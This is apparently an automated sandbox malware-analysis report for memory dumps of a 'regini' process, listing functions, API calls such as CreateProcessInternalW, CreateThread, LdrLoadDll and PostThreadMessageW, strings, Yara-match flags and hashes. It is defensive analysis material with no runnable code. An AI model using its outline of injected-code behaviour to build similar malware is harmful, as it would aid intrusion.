                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 40dde0c8389298ad797ae564f8d4a8148028744fb6309ae09c708644ea90493b
                                                                    • Instruction ID: 4cf9eaf36b44b2e0c33c4b9db8789212870a99f51b200a27fb2f26bb02034f24
                                                                    • Opcode Fuzzy Hash: 40dde0c8389298ad797ae564f8d4a8148028744fb6309ae09c708644ea90493b
                                                                    • Instruction Fuzzy Hash: 3B90026134140842D100B6584454B460006C7E5301F95C115E1064658E8759CD526126
                                                                    Function 03672FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b7d77cbb24993b8e9b22c03e2ab0a95b5023f68450dab8eaf4f102ea49a633bb
                                                                    • Instruction ID: 33800ff4ef5930c83dd1e0d9663238ba41a3c577db1de7273f67c2703e97dc23
                                                                    • Opcode Fuzzy Hash: b7d77cbb24993b8e9b22c03e2ab0a95b5023f68450dab8eaf4f102ea49a633bb
                                                                    • Instruction Fuzzy Hash: D6900221211C0442D200BA684C54B47000687D4303F95C215A0154658DCA5589615521
                                                                    Function 03672FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 951bdee1c65164b812762a832030fd755912015f1b61fc8309d360fda7d38383
                                                                    • Instruction ID: 6005ef6f093c2f0f46cd85166790aa9ef261c7d3b9e208cde4e5076d827fb4b6
                                                                    • Opcode Fuzzy Hash: 951bdee1c65164b812762a832030fd755912015f1b61fc8309d360fda7d38383
                                                                    • Instruction Fuzzy Hash: ED900221601404424140B66888849464006ABE5311795C221A0998654E869989655665
                                                                    Function 03672EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 02c1760a81aa253f97197a968635bdb7a0bdfe00a0155ca24eafc6807ca49990
                                                                    • Instruction ID: 2009c4b21c502db950d934bcdac7fa63bf7a7341f15f1866729f363aeed19f2c
                                                                    • Opcode Fuzzy Hash: 02c1760a81aa253f97197a968635bdb7a0bdfe00a0155ca24eafc6807ca49990
                                                                    • Instruction Fuzzy Hash: 3990026120180803D140BA584844647000687D4302F95C111A2064659F8B698D516135
                                                                    Function 03672E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 110743bf36a287006f2762d9603a0069fbb5422e9b5d2e6f89d15cac22eb950b
                                                                    • Instruction ID: a6601a38d3994d050a93b4310d5cfa758d354a5252bd310f3d630d69f2eca991
                                                                    • Opcode Fuzzy Hash: 110743bf36a287006f2762d9603a0069fbb5422e9b5d2e6f89d15cac22eb950b
                                                                    • Instruction Fuzzy Hash: 8E90022160140902D101B6584444656000B87D4341FD5C122A1024659FCB658A92A131
                                                                    Function 03672D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 424cd822e844f0de59424d2ceb0219ff5c0efd77449fee26d3c563f4c17a2cf2
                                                                    • Instruction ID: 550db0ed94396a8b97b0d23723babb47a8ca8f19d5d513dc8a3aec6ce304e473
                                                                    • Opcode Fuzzy Hash: 424cd822e844f0de59424d2ceb0219ff5c0efd77449fee26d3c563f4c17a2cf2
                                                                    • Instruction Fuzzy Hash: 2F90022130140403D140B65854586464006D7E5301F95D111E0414658DDA5589565222
                                                                    Function 03672D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 7eda0c77d4ed49c629b633745327f00a43da01ac79acd2e7744c66b46c7482f4
                                                                    • Instruction ID: eb3b26cc62c91c58aa2bcf805b03df034cd8fd138102a157ab3551ec396ee687
                                                                    • Opcode Fuzzy Hash: 7eda0c77d4ed49c629b633745327f00a43da01ac79acd2e7744c66b46c7482f4
                                                                    • Instruction Fuzzy Hash: 7390022921340402D180B658544864A000687D5302FD5D515A001565CDCA5589695321
                                                                    Function 03672DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0c1941189cb1d193a099106bec33393777b3f246b878689b08df1d155923ecdd
                                                                    • Instruction ID: 6cebf13566ce982b6a45d412a60939e0e5e16a162780faa10336b83753f66aa7
                                                                    • Opcode Fuzzy Hash: 0c1941189cb1d193a099106bec33393777b3f246b878689b08df1d155923ecdd
                                                                    • Instruction Fuzzy Hash: 4490023120140813D111B6584544747000A87D4341FD5C512A042465CE97968A52A121
                                                                    Function 03672DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 253e6dcfcae3c80fa1c042529e4a1fe9e781fa790703fd62d34e43de3fad84a2
                                                                    • Instruction ID: 3cd3554952be4e277cf9caf681f4d01bb0d632706e383e7fb4c57cb3c80cca1e
                                                                    • Opcode Fuzzy Hash: 253e6dcfcae3c80fa1c042529e4a1fe9e781fa790703fd62d34e43de3fad84a2
                                                                    • Instruction Fuzzy Hash: DE900221242445525545F6584444547400797E43417D5C112A1414A54D86669956D621
                                                                    Function 03672C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 6788562e8e983b300f9bf29eabbf1986e601c5e65499951b0e880f53bc649482
                                                                    • Instruction ID: a73d70b26dc13e65620a629f34f1aa02e7663319655713b10b705c0158acf1b1
                                                                    • Opcode Fuzzy Hash: 6788562e8e983b300f9bf29eabbf1986e601c5e65499951b0e880f53bc649482
                                                                    • Instruction Fuzzy Hash: 1890023120140C42D100B6584444B86000687E4301F95C116A0124758E8755C9517521
                                                                    Function 03672C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: fdc63664eb2456a73da58ae88b433236a598b136d3383bb955f8bad88925d6ea
                                                                    • Instruction ID: 57c9decabb3b232f45a361f624714e0ec6778d0d7793dceab87a2f73d3ff40a1
                                                                    • Opcode Fuzzy Hash: fdc63664eb2456a73da58ae88b433236a598b136d3383bb955f8bad88925d6ea
                                                                    • Instruction Fuzzy Hash: 5890023120148C02D110B658844478A000687D4301F99C511A442475CE87D589917121
                                                                    Function 03672CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: dfbeefffa24b521b8078332ff1d50c2c3c2a5e021f386f356bb0a8ed433b041b
                                                                    • Instruction ID: 4947b2c852d1bbb9d6bcd5b7e1280a91f65a64248abaac80ad49a95163ad975f
                                                                    • Opcode Fuzzy Hash: dfbeefffa24b521b8078332ff1d50c2c3c2a5e021f386f356bb0a8ed433b041b
                                                                    • Instruction Fuzzy Hash: 5290023120140802D100BA985448686000687E4301F95D111A5024659FC7A589916131
                                                                    Function 036735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 6137beca0e7834bca7ee2681fdbfb31d3478a6c9e68e18d62e9f842641a3eaf3
                                                                    • Instruction ID: 14704e88bd9990a7bf10593cddd3698b0d90077dcbd448423a2d23fe0b545408
                                                                    • Opcode Fuzzy Hash: 6137beca0e7834bca7ee2681fdbfb31d3478a6c9e68e18d62e9f842641a3eaf3
                                                                    • Instruction Fuzzy Hash: 3A90023160550802D100B6584554746100687D4301FA5C511A042466CE87D58A5165A2
                                                                    Function 036739B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 3017c3c725664d8964b22ba38fe065551955177301b43a76e6bb452047da1bc0
                                                                    • Instruction ID: b91b390339b3ce60c56b9f67de7451120a0410e939cc0a370b205825e8be5faf
                                                                    • Opcode Fuzzy Hash: 3017c3c725664d8964b22ba38fe065551955177301b43a76e6bb452047da1bc0
                                                                    • Instruction Fuzzy Hash: AD90022124545502D150B65C44446564006A7E4301F95C121A0814698E869589556221
                                                                    Function 02E1103A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 459 2e1103a-2e11044 460 2e11046-2e1104d 459->460 461 2e1107e-2e11081 459->461 462 2e11096-2e110ab 460->462 463 2e1104f-2e11059 460->463 464 2e110ad-2e110c5 462->464 465 2e1112c-2e1114e 462->465 463->461 464->465 466 2e11170-2e11175 465->466 467 2e11150-2e11161 PostThreadMessageW 465->467 467->466 468 2e11163-2e1116d 467->468 468->466
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: +Yf$7046-nn1K$7046-nn1K
                                                                    • API String ID: 0-152878582
                                                                    • Opcode ID: 8835f3a4d3a980d73cac9d5451b61f837560031cbaac1f6e90a95f3aac6059d8
                                                                    • Instruction ID: fc2a121ebd1795d0d9aabf771bd2fbc095e9cfc3282b8a006768d9ff7bf236c0
                                                                    • Opcode Fuzzy Hash: 8835f3a4d3a980d73cac9d5451b61f837560031cbaac1f6e90a95f3aac6059d8
                                                                    • Instruction Fuzzy Hash: D9114C72B853566AC712CEA48C41BDDBB649F42604F04C6FAEA089F6C1D3B18D0AC7A5
                                                                    Function 02E110E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostThreadMessageW.USER32(7046-nn1K,00000111,00000000,00000000), ref: 02E1115D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: 7046-nn1K$7046-nn1K
                                                                    • API String ID: 1836367815-59622768
                                                                    • Opcode ID: d7e9b385db7a893af6d06d15f612bd5b028044d3961f742fb336328be005be11
                                                                    • Instruction ID: 171866df7eae7c54186db3b43341d82fbca6a1fbea881a7686e7f62593e267da
                                                                    • Opcode Fuzzy Hash: d7e9b385db7a893af6d06d15f612bd5b028044d3961f742fb336328be005be11
                                                                    • Instruction Fuzzy Hash: 0A01A171E8035876EB21AA908C41FDFBB7C9F41B54F008155FA087B2C0D6B866068BA5
                                                                    Function 02E1F799 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InitializeUninitialize
                                                                    • String ID: @J7<
                                                                    • API String ID: 3442037557-2016760708
                                                                    • Opcode ID: 5c8f61afe39968cdc0262e8706fd851897aae8b8c2792e7432e2034d9de46969
                                                                    • Instruction ID: 557dfdc124f34d0bfff5a47881250ac6f540e4988b987008bcc0b6219854c14d
                                                                    • Opcode Fuzzy Hash: 5c8f61afe39968cdc0262e8706fd851897aae8b8c2792e7432e2034d9de46969
                                                                    • Instruction Fuzzy Hash: 764132B6A00609AFDB00DFD8DC809EFB7B9BF88308B148559E515AB214D775AA45CFA0
                                                                    Function 02E23CB0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000007D0), ref: 02E23D8B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: net.dll$wininet.dll
                                                                    • API String ID: 3472027048-1269752229
                                                                    • Opcode ID: caf3f53cf78b67052efb43c6d0e36f4632bc381f8b2bc07a40985e89f40086ca
                                                                    • Instruction ID: 1b447977acacf8aa157ab6160d46dab3824d9bae99cb9efed444666d1204e70d
                                                                    • Opcode Fuzzy Hash: caf3f53cf78b67052efb43c6d0e36f4632bc381f8b2bc07a40985e89f40086ca
                                                                    • Instruction Fuzzy Hash: B2317CB1A41205BBD714DFA4CC84FEBBBA9EB84704F00965DF91E6B240C7B46644CFA4
                                                                    Function 02E1F7A0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InitializeUninitialize
                                                                    • String ID: @J7<
                                                                    • API String ID: 3442037557-2016760708
                                                                    • Opcode ID: 1c77e547fd79fcce36bf9df70f39e975db22a09bbaa201da96c6956962a185f2
                                                                    • Instruction ID: 2602411d8ff6c4bdedb23f2924230e5678e95a5cc3f6386a459967d5d58e36c4
                                                                    • Opcode Fuzzy Hash: 1c77e547fd79fcce36bf9df70f39e975db22a09bbaa201da96c6956962a185f2
                                                                    • Instruction Fuzzy Hash: 2D3110B5A0060A9FDB10DFD8D8809EFB7B9BF88304B108559E516EB214D775EE45CBA0
                                                                    Function 02E14900 Relevance: 1.6, APIs: 1, Instructions: 62libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02E148F2
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 295511a4b9a9809ddb0f2405e035b47971a4899ec19f0757c05ee201b5cbdbb2
                                                                    • Instruction ID: ce7a80fdbb2069d2fe8fd95c10b10362c6abbabb5034cdb8a14cb2cd5af63d10
                                                                    • Opcode Fuzzy Hash: 295511a4b9a9809ddb0f2405e035b47971a4899ec19f0757c05ee201b5cbdbb2
                                                                    • Instruction Fuzzy Hash: 01014C3AA8428C6BDB10EA64DC41AD9B778DF41749F049264E585E7342E632E64F8B81
                                                                    Function 02E14880 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02E148F2
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                    • Instruction ID: dce6ce29eaf96a65058a1593b7c3e1130c1ae303703693baa5f7d51817b152a6
                                                                    • Opcode Fuzzy Hash: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                    • Instruction Fuzzy Hash: A1015EB5E4024DABDB10EAA4DC41FDDB3B9AB44308F1091A5B909A7280F670E708CB91
                                                                    Function 02E29AE0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessInternalW.KERNELBASE(?,?,?,?,02E1864E,00000010,?,?,?,00000044,?,00000010,02E1864E,?,?,?), ref: 02E29B40
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    • Opcode ID: d9af997e76cc9c93d5c50f47e23c34d344b85f94735d18940a576783256a0e6a
                                                                    • Instruction ID: 39c75e36e81846426624aff5f45c6649d913af68d21afd4ffb97bc4a7d459318
                                                                    • Opcode Fuzzy Hash: d9af997e76cc9c93d5c50f47e23c34d344b85f94735d18940a576783256a0e6a
                                                                    • Instruction Fuzzy Hash: 2B0192B2205208BBDB44DF99DC91EDB77EDAF8C754F018518BA09E7241D630FD518BA4
                                                                    Function 02E09DE0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E09E25
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: 09599bacac6296b3e500525234d41ace2e86357925da6c38dffadbb1074705f5
                                                                    • Instruction ID: b266ca16d103cdadda74ecfd8ebd28526d4d60fd03012f6e23931c28cec02e23
                                                                    • Opcode Fuzzy Hash: 09599bacac6296b3e500525234d41ace2e86357925da6c38dffadbb1074705f5
                                                                    • Instruction Fuzzy Hash: 81F065337C431436D63065E99C42FDBB69DCB80B61F158015F70DEF1C1D995B44146A5
                                                                    Function 02E09DDC Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E09E25
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: 16b1c3e28c50ff0840523fe201d9b8e2824fdbd3defa945c96347b3a63df4177
                                                                    • Instruction ID: fca651bae901d70a3dfbce60fd48560da67492c397e4c875130b53f3b33f7869
                                                                    • Opcode Fuzzy Hash: 16b1c3e28c50ff0840523fe201d9b8e2824fdbd3defa945c96347b3a63df4177
